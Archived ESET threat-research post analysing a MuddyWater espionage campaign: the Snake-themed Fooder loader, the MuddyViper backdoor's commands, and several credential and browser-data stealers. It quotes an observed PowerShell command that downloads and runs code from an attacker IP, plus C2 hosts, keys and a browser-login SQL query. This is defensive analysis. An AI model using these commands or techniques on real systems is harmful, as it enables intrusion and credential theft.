{ "id": "001b3c83-7adb-4cfb-a9da-ea2d79cef031", "created_at": "2026-04-29T02:22:19.202887Z", "updated_at": "2026-04-29T08:21:08.67756Z", "deleted_at": null, "sha1_hash": "5c778a0a80a658b98989a084d150dd58e2286dc8", "title": "MuddyWater: Snakes by the riverbank", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 896266, "plain_text": "MuddyWater: Snakes by the riverbank\r\nBy ESET Research\r\nArchived: 2026-04-29 02:11:25 UTC\r\nESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed\r\ntarget in Egypt. MuddyWater, also referred to as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group\r\nknown for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and\r\npublicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the\r\nobjective of improving defense evasion and persistence. Among these tools is a custom Fooder loader designed to execute\r\nMuddyViper, a C/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and its internal logic\r\nincludes a custom delay function inspired by the game’s mechanics, combined with frequent use of Sleep API calls. These\r\nfeatures are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system\r\ninformation, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data.\r\nThe campaign also leverages credential stealers (CE‑Notes and LP‑Notes) and reverse tunneling tools (go‑socks5), long a\r\nfavorite of MuddyWater operators.\r\nAlthough this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several\r\nyears and have documented its activities in multiple ESET APT Activity Reports. Unlike previous campaigns of\r\nMuddyWater, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused,\r\nsophisticated, and refined approach.\r\nKey points of this blogpost:\r\nMuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique\r\nfor Iran-aligned groups and somewhat atypical across the broader threat landscape.\r\nThe group also used more advanced techniques to deploy MuddyViper, a new backdoor, by using a loader\r\n(Fooder) that reflectively loads it into memory and executes it.\r\nWe provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder\r\nloader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer,\r\nand go‑socks5 reverse tunnels.\r\nDuring this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, which is\r\na historically noisy technique often characterized by mistyped commands.\r\nMuddyWater group overview\r\nMuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North\r\nAmerica. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has links to the Ministry of\r\nIntelligence and National Security of Iran.\r\nThe group was first introduced to the public as MuddyWater by Unit 42 in 2017, whose description of the group’s activity is\r\nconsistent with ESET’s profiling – a focus on cyberespionage, the use of malicious documents as attachments designed to\r\nprompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.\r\nNotable past activities include Operation Quicksand (2020), a cyberespionage campaign targeting Israeli government\r\nentities and telecommunications organizations, which exemplifies the group’s evolution from basic phishing tactics to more\r\nadvanced, multistage operations; and a campaign targeting political groups and organizations in Türkiye, demonstrating the\r\ngroup’s geopolitical focus, its ability to adapt social engineering tactics to local contexts, and reliance on modular malware\r\nand flexible C\u0026C infrastructure.\r\nBesides its frequent activity, MuddyWater operations are often noisy. The group is known for its persistent targeting of\r\ngovernment, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly\r\navailable tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy,\r\nIsrael, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.\r\nESET has documented multiple campaigns attributed to MuddyWater that highlight the group’s evolving toolset and shifting\r\noperational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more\r\nrecent campaigns demonstrate signs of technical refinement and increased precision.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 1 of 20\n\nIn March and April 2023, MuddyWater targeted an unidentified victim in Saudi Arabia by deploying a batch script that\r\ndownloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to\r\nremove the initial payload from disk.\r\nThe group conducted a campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an\r\nOilRig subgroup), further detailed in this publication. This latest overlap suggests an evolution in MuddyWater’s modus\r\noperandi.\r\nThe group’s publicly documented custom tools include, for example, the Bugsleep, Blackout, Small Sieve, Mori, and\r\nPOWERSTATS backdoors, as well as custom-compiled variants of open-source tools such as LaZagne or CrackMapExec.\r\nMuddyWater campaigns typically do not leverage or introduce new tools, malware, or techniques; instead, they are often\r\nnoteworthy due to the targeting.\r\nWhile MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the\r\nmanufacturing sector through spearphishing. The attack generated considerable noise and achieved little in terms of\r\noperational objectives.\r\nThe campaign outlined in this publication shows what, for MuddyWater, seems to be an unprecedented advancement in\r\ntoolset and technical execution.\r\nVictimology\r\nAs previously mentioned, during this campaign, MuddyWater primarily targeted organizations in Israel, but also one in\r\nEgypt. Table 1 lists the victims by country and vertical. The campaign began on September 30th, 2024 and concluded on\r\nMarch 18th, 2025.\r\nTable 1. Victims by country and vertical\r\nCountry Vertical\r\nEgypt Technology\r\nIsrael\r\nEngineering #1\r\nEngineering #2\r\nEngineering #3\r\nLocal Government #1\r\nLocal Government #2\r\nManufacturing\r\nTechnology\r\nTransportation\r\nUtilities\r\nUniversity #1\r\nUniversity #2\r\nUniversity #3\r\nUnidentified #1\r\nUnidentified #2\r\nUnidentified #3\r\nUnidentified #4\r\nUnidentified #5\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 2 of 20\n\nOne interesting thing to note about the victim in the utilities vertical is that they were also compromised by Lyceum on\r\nFebruary 11\r\nth\r\n, 2025.\r\nOverlap and cooperation with Lyceum\r\nIn early 2025, ESET Research identified an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014\r\nand is commonly believed to be based in Iran. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin,\r\nSolar, Mango, OilForceGTX, and a variety of downloaders that leverage legitimate cloud services for C\u0026C communication.\r\nWe have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental\r\nentities, as well as organizations in the healthcare sector.\r\nDuring the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February\r\n2025, MuddyWater initiated access through a spearphishing email containing a link to an installer for the Syncro remote\r\nmonitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM\r\ntool, PDQ, and deployed a custom Mimikatz loader disguised as certificate files with .txt file extensions. Based on the\r\nobserved activity, harvested credentials were probably used by Lyceum to gain access and assume control of operations\r\nwithin the targeted manufacturing-sector organization in Israel.\r\nThis cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.\r\nAttribution\r\nThe victimology, TTPs, and tooling observed in this campaign align with several of the newly documented capabilities and\r\ntools that we have previously attributed to MuddyWater. This assessment is based on the initial access method and the\r\nsubsequent delivery of malicious tools – generally via spearphishing emails that contain links to download RMM software.\r\nTTPs\r\nMuddyWater operators continue to rely on predictable and script-based backdoors written in PowerShell and Go. Their\r\ntargeting remains focused on the telecommunications, governmental, and oil and energy sectors.\r\nInitial access is typically achieved through spearphishing emails, often containing PDF attachments that link to installers for\r\nRMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of\r\nRMM tools including Atera, Level, PDQ, and SimpleHelp.\r\nAmong the tools deployed by MuddyWater operators is also the VAX‑One backdoor, named after the legitimate software\r\nwhich it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.\r\nThe group’s continued reliance on this familiar playbook makes its activity relatively easy to detect and block.\r\nTools overlap\r\nAdditionally, we identified code overlaps between several of the newly documented tools and those we previously attributed\r\nto MuddyWater:\r\nLP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer, that we previously\r\nassociated with MuddyWater. During this campaign, we also observed a Mimikatz loader, which shares the same\r\ndesign and obfuscation methods as CE-Notes.\r\nWe observed several new variants of MuddyWater’s customized go‑socks5 reverse tunnels, which the group used\r\nthroughout 2024 and 2025.\r\nIn two instances, we observed the customized go‑socks5 reverse tunnels embedded in a new MuddyWater loader,\r\ninternally named Fooder. In a dozen other cases, this loader was used to load MuddyWater’s new backdoor,\r\nMuddyViper.\r\nInterestingly, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for data\r\nencryption and decryption. To the best of our knowledge, this is unique to Iran-aligned groups. Another trait these\r\ntools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.\r\nToolset\r\nIn this blogpost, we document previously unknown, custom tools used by MuddyWater:\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 3 of 20\n\nFooder loader – a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note\r\nthat several versions of Fooder masquerade as the classic Snake game, hence the designation, MuddyViper. Another\r\nnotable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the\r\nSnake game, combined with Sleep API calls. These features are intended to delay execution in an attempt to hide\r\nmalicious behavior from automated analysis systems.\r\nMuddyViper backdoor – a previously undocumented C/C++ backdoor that enables attackers to collect system\r\ninformation, download and upload files, execute files and shell commands, and steal Windows credentials and\r\nbrowser data.\r\nThe rest of the toolset documented in this blogpost includes:\r\nCE-Notes, a browser-data stealer,\r\nLP-Notes, a credential stealer,\r\nBlub, a browser-data stealer, and\r\nseveral go‑socks5 reverse tunnels.\r\nFooder loader\r\nFooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in\r\nFigure 1), with MuddyViper being the most frequently observed payload.\r\nFigure 1. Relationships between Fooder and its launcher and payload\r\nFooder seems to be the internal name of this tool, based on its PDB paths:\r\nC:\\Users\\win\\Desktop\\Fooder\\Debug\\Launcher.pdb\r\nC:\\Users\\pc\\Desktop\\main\\My_Project\\Fooder\\x64\\Debug\\Launcher.pdb\r\nAlthough we have only captured one sample of it, we believe that Fooder is executed by a simple launcher application,\r\nwritten in C. It has no string obfuscation and verbose logging to the console, and the PDB path left intact:\r\nC:\\Users\\pc\\source\\repos\\ConsoleApplication7\\x64\\Release\\ConsoleApplication7.pdb\r\nWe have observed one instance (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the component launching\r\nFooder. Deployed under the name %USERPROFILE%\\Downloads\\OsUpdater.exe, the launcher expects a process ID as a\r\ncommand line argument. Once executed, it attempts to duplicate the token of the specified process via the\r\nDuplicateTokenEx API, and then uses CreateProcessAsUserA to execute Fooder.\r\nOnce executed, Fooder decrypts the embedded payload following these steps:\r\nThe command line argument (6) is added to each byte of a hardcoded key, which produces the AES decryption key,\r\nshared across all samples, 6969697820511281801712341067111416133321394945138510872296106446.\r\nA hardcoded value (5) is subtracted from each byte of the hardcoded payload.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 4 of 20\n\nFinally, the hardcoded payload is decrypted using the WinCrypt API and the AES key.\r\nFooder then loads the payload directly into memory using reflective techniques, allowing it to execute without relying on\r\nstandard system calls or writing to disk.\r\nOnce launched thus, Fooder has been used to deliver not only MuddyViper but also HackBrowserData, an open-source\r\nutility capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also\r\nfacilitates the deployment of go‑socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling\r\nattackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has\r\npreviously utilized go‑socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network\r\ncommunication and data exfiltration.\r\nNote that several versions of Fooder masquerade as the Snake game – see the strings and mutexes highlighted in Figure 2 –\r\nits most frequently embedded payload.\r\nFigure 2. Multiple Fooder instances masquerade as the Snake game\r\nAnother notable characteristic of Fooder is its frequent use of a custom delay function (which implements the core logic of\r\nthe Snake game, where the player maneuvers the end of a growing line, often themed as a snake, to avoid obstacles and\r\ncollect items) and the Sleep API calls. The delay in execution is achieved by mimicking the loop-based delay function: as in\r\nthe Snake game, where each movement is controlled by a loop that waits for a short period before updating the game. The\r\nloop introduces execution delays that slow down the malware’s behavior, helping it to evade tools that monitor for rapid\r\nmalicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 5 of 20\n\nFigure 3. Various calls to delay execution are dispersed throughout Fooder’s code\r\nFooder does not have any built-in persistence capability. However, in cases when Fooder’s final payload is the MuddyViper\r\nbackdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.\r\nMuddyViper backdoor\r\nMuddyViper, a previously undocumented backdoor written in C and C++, enables gaining covert access and control over\r\ncompromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which might be the reason there\r\nis no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent\r\nstatus messages to its C\u0026C server throughout its execution, such as the following:\r\n[+] Persist: -------------------- Hi,I am Live --------------------\r\n[+] Persist: -------------------- Hi,First Time --------------------\r\n[-] Persist: failed Create task !!!!\r\nThe backdoor also keeps a lengthy list of 150+ process names and details about the respective products to be able to send\r\ndetailed reports about the security tools detected in the compromised environment, even though adding the details could\r\nhave been easily implemented on the server side:\r\n[\u003e] Process: aciseagent.exe ~~\u003e (Cisco Umbrella Roaming Security) --\u003e (Security DNS) found!\r\n[\u003e] Process: acnamagent.exe ~~\u003e (Absolute Persistence) --\u003e (Asset Management) found!\r\n[\u003e] Process: acnamlogonagent.exe ~~\u003e (Absolute Persistence) --\u003e (Asset Management) found!\r\nThis behavior results in substantial network traffic.\r\nMuddyViper has two methods of establishing persistence:\r\nIts installation directory can be configured as a Windows Startup folder, by setting the following registry values to\r\n%APPDATALOCAL%\\Microsoft\\Windows\\PPBCompatCache\\ManagerCache:\r\n○ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup.\r\n○ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup.\r\nA scheduled task named ManageOnDriveUpdater can launch MuddyViper from the path on each system start.\r\nMuddyViper supports 20 backdoor commands – see Table 2 for details of all of them – notably including the ability to open\r\nand operate reverse shells, download, upload, and execute files, report the running security tools, steal user credentials and\r\ndata from a variety of browsers, set up its own persistence, and uninstalling itself.\r\nTable 2. MuddyViper backdoor commands\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 6 of 20\n\nID Arguments Action Response\r\n200 N/A N/A\r\n0, via the GET /adad or\r\nGET /aq36 request, to\r\nobtain a backdoor\r\ncommand.\r\n207 N/A\r\nDecrypts the embedded HackBrowserData tool and\r\nreflectively loads it in a new thread. This open-source\r\ntool can steal credentials, history, and other information\r\nfrom web browsers.\r\nMuddyViper then compresses the collected data (into a\r\nfile named CacheDump.zip) and uploads it to the C\u0026C\r\nserver.\r\nCollected browser data, via\r\nthe GET /mq65 request.\r\nIn case of an error, a custom\r\nstatus message is sent\r\ninstead.\r\n300 \u003ccommand_line\u003e\r\nLaunches a reverse shell using:\r\n• the provided command line (command ID 300)\r\n•  C:\\windows\\system32\\cmd.exe (command ID 301)\r\n•  C:\\windows\\system32\\WindowsPo\r\nwerShell\\v1.0\\Powershell.exe (command ID 302)\r\nThen, in a loop, uploads the process output to the C\u0026C\r\nserver and interprets the server response (see command\r\nIDs 350-352) until interrupted.\r\nProcess output, via the GET\r\n/oi32 request.\r\nIn case of an error, a custom\r\nstatus message is sent\r\ninstead.\r\n301 N/A\r\n302 N/A\r\n350 N/A\r\nMust follow command IDs 300-302. Sleeps for a\r\npreconfigured amount of time – for the reverse shell\r\nloop, the default is one second.\r\n351\r\nSleep time (in\r\nmilliseconds)\r\nMust follow command IDs 300-302. Configures the\r\nsleep time for the reverse shell loop – the default is one\r\nsecond.\r\n352\r\nInput for the\r\nreverse shell.\r\nMust follow command IDs 300-302. Passes the\r\nprovided argument to the running reverse shell.\r\n360 N/A Not implemented, likely related to the reverse shell API.\r\nA custom error message:\r\n[-] Agent does not have an\r\nactive pipe\r\n400 Flag.\r\nMust follow command ID 401. It confirms that the C\u0026C\r\nserver has successfully received a part of the exfiltrated\r\nlocal file. Optionally adjusts the sleep before the next\r\nupload specified in command ID 401 to 10 seconds.\r\nNo response, unless this\r\ncommand is issued outside\r\nof a pending file upload\r\nprocess, it sends a custom\r\nerror message:\r\n[-] Agent does not have an\r\nDOWNLOAD file\r\n401\r\nSleep time (in\r\nmilliseconds),\r\nfilename.\r\nInitiates a file upload operation from the specified local\r\nfile to the C\u0026C server in chunks, with the specified\r\nsleep time between each upload.\r\nContents of the specified\r\nfile, via a series of GET\r\n/dadw requests.\r\n500 Data chunk.\r\nMust follow command ID 501. Writes the received data\r\nchunk into a previously created and opened local file.\r\nA custom error message, if\r\nthe operation fails.\r\n501 Sleep time (in\r\nmilliseconds),\r\nfilename.\r\nDownloads a file from the C\u0026C server in chunks into a\r\nlocal file with the specified name. The specified sleep\r\ntime is used as a delay after downloading each data\r\nA series of GET /dadwqa\r\nrequests, to request the file\r\ncontents.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 7 of 20\n\nID Arguments Action Response\r\nchunk. Deletes the file if the connection cannot be\r\nestablished after six consecutive attempts.\r\n700\r\nSleep time (in\r\nmilliseconds)\r\nConfigures the sleep time between connection attempts\r\nto the specified value (default is 60 seconds).\r\nN/A\r\n800 N/A\r\nEnumerates running processes, searching for selected\r\nsecurity tools from an extensive hardcoded list.\r\nFor each detected process,\r\nsends a report with the\r\nfollowing information,\r\npopulated from that\r\nhardcoded table:\r\n[\u003e] Process:\r\n\u003cprocess_name\u003e ~~\u003e\r\n(\u003cproduct_name\u003e) --\u003e\r\n(\u003ccategory\u003e) found!\r\n805\r\nTimeout (in\r\nmilliseconds)\r\nDisplays a fake Windows Security dialog (see Figure 4),\r\nprompting the user to fill in credentials, which are then\r\nexfiltrated to the C\u0026C server. Uses the provided\r\nargument as a timeout for the dialog.\r\nCollected credentials, via\r\nthe GET /rq13 request:\r\n[+] creds ~~\u003e Username:\r\n\u003cusername\u003e ~~\u003e Password:\r\n\u003cpassword\u003e\r\nIf not successful, a custom\r\nerror message is sent\r\ninstead.\r\n806 N/A\r\nSets up persistence via a scheduled task named\r\nManageOnDriveUpdater. The backdoor copies itself to\r\nits installation path, unless it is already running from\r\nthere.\r\nA custom status message,\r\ndepending on the outcome\r\nof the operation.\r\n900 N/A\r\nUninstalls itself. First, clears persistence set via a\r\nWindows Startup Folder and then deletes itself.\r\nNote that this action will not clear the persistence via a\r\nscheduled task that can be set by the backdoor\r\ncommand ID 806.\r\nA custom status message,\r\ndepending on the outcome\r\nof the operation.\r\n905 N/A Terminates the current backdoor process. N/A\r\n906 N/A\r\nRelaunches itself (via the CreateProcessW API) and\r\nterminates the current process.\r\nA custom status message,\r\ndepending on the outcome\r\nof the operation.\r\nother N/A N/A\r\n[-] Agent statusCode I don't\r\nhave it\r\nOne of the commands listed in Table 2, with ID 805, displays a fake Windows Security dialog in an attempt to entice the\r\nvictim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater’s LP-Notes\r\nstealer (see LP-Notes credential stealer).\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 8 of 20\n\nFigure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\r\nAnother command, with ID 900, aims to remove MuddyViper from the compromised machine and clear its persistence;\r\nhowever, the command does not remove all traces of the backdoor.\r\nNetwork protocol\r\nTo communicate with its C\u0026C server, MuddyViper uses HTTP GET requests (via the WinHTTP API) over port 443, with\r\nthe WINHTTP_FLAG_SECURE flag configured to use SSL/TLS. Two C\u0026C servers have been observed:\r\nprocessplanet[.]org and 35.175.224[.]64.\r\nBoth directions of communication AES-CBC encrypt the data, using the CNG API with the key (used across samples)\r\n0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.\r\nIn the backdoor → server direction of the communications:\r\nEach endpoint URI supported by the C\u0026C server can be used by the backdoor for a specific type of request, such as\r\nrequesting a command, uploading a file, or sending a custom status message.\r\nAdditional data for the C\u0026C server is included in the HTTP request body, which is unconventional for HTTP GET\r\nrequests.\r\nThe User-Agent string is A WinHTTP Example Program/1.0, a remnant of the example code for the WinHttpOpen\r\nAPI.\r\nThe connection, send, receive, and response timeouts are set to 30 seconds.\r\nDefault sleep time between consecutive connection attempts is 60 seconds. This value can be configured by\r\ncommand ID 700.\r\nUpon failure, connection attempts are retried up to 10 times.\r\nPrior to encryption, the data is always formatted as \u003ccomputer_name\u003e/\u003cusername\u003e*\u003cdata\u003e.\r\nIn the server → backdoor direction of the communications:\r\nThe HTTP status code determines the backdoor command ID.\r\nThe backdoor command arguments are included in the HTTP response body.\r\nCE-Notes browser-data stealer\r\nCE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to stage stolen data on disk. We\r\ndiscovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an\r\norganization in Israel.\r\nCE-Notes was downloaded with the following PowerShell command:\r\n\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" (Invoke-WebRequest -UseDefaultCredentials -\r\nUseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression\r\nBoth versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State\r\nfile (%APPDATA%\\Local\\Google\\Chrome\\User Data\\Local State) of Chromium browsers (Chrome, Brave, and Edge).\r\nApp-bound encryption was introduced in Chrome version 127, enabling Chrome to encrypt data tied to app identity.\r\nCybercriminals and APT groups have caught on and are actively trying to work around app-bound encryption to steal\r\nsession keys. CE-Notes is quite similar to ChromElevator on GitHub.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 9 of 20\n\nThe collected data is AES-CBC encrypted using the CNG API with the key\r\n9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV\r\n4103A09887B82FFD56A93BB431805224.\r\nThen the encrypted data is stored on disk in C:\\Users\\Public\\Downloads\\ce-notes.txt for later retrieval (probably via an\r\nRMM tool, since neither the EXE nor the DLL versions have any means of exfiltrating the file). The primary difference\r\nbetween the EXE and the DLL is the virtual machine evasion functionality added to the DLL.\r\nWe observed the CE-Notes browser-data stealer in the following locations:\r\nC:\\system2.dll\r\nC:\\Users\\Public\\Downloads\\system2.dll\r\nC:\\Intel\\system.dll\r\nC:\\20240926_165509.exe\r\nLP-Notes credential stealer\r\nLP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the\r\nsame naming convention as in the case of CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage\r\nstolen credentials before exfiltration: C:\\Users\\Public\\Downloads\\lp-notes.txt (vs. C:\\Users\\Public\\Downloads\\ce-notes.txt).\r\nThe sole purpose of LP-Notes is to entice victims into submitting their credentials by displaying a fake Windows Security\r\ndialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being\r\ndownloaded and executed by PowerShell with a very similar command line to that shown in the CE-Notes section.\r\nInitialization\r\nOn execution, LP-Notes starts by searching for a process named taskhostw.exe (Host Process for Windows Tasks) and then\r\nimpersonating the security context of the process (via the ImpersonateLoggedOnUser API); only then does LP-Notes\r\nactivate its malicious payload.\r\nLP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption.\r\nFigure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters, though the decryption key is\r\nalways the same – a set of predefined constants that are added or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except for a different decryption key, as shown in Figure 6.\r\nFigure 5. LP-Notes string decryption routine\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 10 of 20\n\nFigure 6. CE-Notes string decryption routine, similar to that of LP-Notes\r\nLP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and\r\nimport names. Finally, to obscure the use of Windows API functions and to make static analysis more challenging, LP-Notes\r\ndynamically resolves the API functions during the C runtime startup, before the execution of the WinMain function, the\r\nstandard entry point for a graphical Windows-based application per Microsoft, thus hiding direct references to the API\r\nfunctions from pseudocode view (see Figure 7).\r\nFigure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)\r\nCapabilities\r\nIn an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows\r\nusername and password, as shown in Figure 8 (via the CredUIPromptForWindowsCredentialsW API). Note that although\r\nsimilar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately confirms the\r\nvalidity of any submitted credentials by attempting to log on as that user (via the CredUnPackAuthenticationBufferW and\r\nLogonUserW APIs).\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 11 of 20\n\nFigure 8. A fake Windows Security dialog displayed by LP-Notes\r\nIf successful, the harvested credentials are then AES-CBC encrypted using the CNG API with the key\r\nED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV\r\n91A4E6F6D51DAEE773A8F00279792578.\r\nSimilar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file – in this case\r\nC:\\Users\\Public\\Downloads\\lp-notes.txt. As neither of these components have the capability to exfiltrate data, another\r\ncomponent presumably handles this (either an RMM tool or MuddyViper).\r\nBlub browser-data stealer\r\nBlub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The name is derived from its filename,\r\nBlub.exe. We observed the PDB path C:\\Users\\jojo\\source\\repos\\stealer\\x64\\Release\\stealer.pdb. It steals user login data\r\nfrom Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera web browsers.\r\nChromium-based browsers\r\nFor Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Local State. This key is used to encrypt sensitive data stored by\r\nChrome, such as passwords or cookies, and it is protected by the Data Protection API (DPAPI) so that it can only be\r\ndecrypted on the system where it was originally encrypted. Blub decrypts this key via the CryptUnprotectData API, and then\r\nuses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. The\r\ncredentials, stored in C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\\u003cprofile_name\u003e\\Login Data, are\r\nobtained via the following SQL query:\r\nSELECT origin_url, username_value, password_value FROM logins\r\nA similar series of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using\r\nthe key obtained from C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State and C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local State, respectively.\r\nFirefox\r\nFinally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and\r\nencryptedPassword values from the logins.json file in each user’s profile directory, i.e.,\r\n%APPDATAROAMING%\\Mozilla\\Firefox\\Profiles\\\u003cprofile_name\u003e\\. The credentials are then decrypted using the\r\nPK11SDR_Decrypt function from the nss3.dll library used by Firefox.\r\nThe collected data is stored into a local file named file.txt, with no encryption. The same data is logged onto the console,\r\nwith no encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.\r\nNote that Blub checks for running processes associated with security solutions before executing its malicious payload,\r\nfocusing on the combination of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is\r\ndetected running (but not AvastSvc.exe), Blub concludes that Norton is running (which now uses the Avast engine) on the\r\ncompromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, except it skips stealing\r\ncredentials from Microsoft Edge.\r\nhttps://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\r\nPage 12 of 20\n\nWhile Blub’s strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google\r\nChrome data stealer functionality. Specifically, multiple strings are concatenated into one long string, with 16 random\r\ncharacters between them, apparently to hide them from view during static analysis:\r\ngdGlog}o{eRwjpw\u0026\"encrypted_key\":FAe[{hy|b-vcJvxGImpersonateLoggeh}gdOvlgt_NxuoolOpenProcessTokenVLUKKW'xxqjpwe}uDuplicateTokenExs5\u0026}vl{tiplh|io|eIpuvvkdXznx(Gh}n2\r\nRemoving the junk characters and splitting the strings returns:\r\n\"encrypted_key\":\r\nImpersonateLogge\r\nOpenProcessToken\r\nDuplicateTokenEx\r\ngo‑socks5 reverse tunnels\r\nMuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as\r\ngo‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.\r\nMost of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build\r\nconfiguration strings shown in Figure 9 and in other artifacts.\r\npath ESETGO\r\nmod ESETGO (devel)\r\ndep github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=\r\ndep github.com/hashicorp/yamux v0.1.1 h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=\r\ndep golang.org/x/net v0.29.0 h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=\r\ndep golang.org/x/sys v0.25.0 h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=\r\nbuild -buildmode=exe\r\nbuild -compiler=gc\r\nbuild -ldflags=\"-w 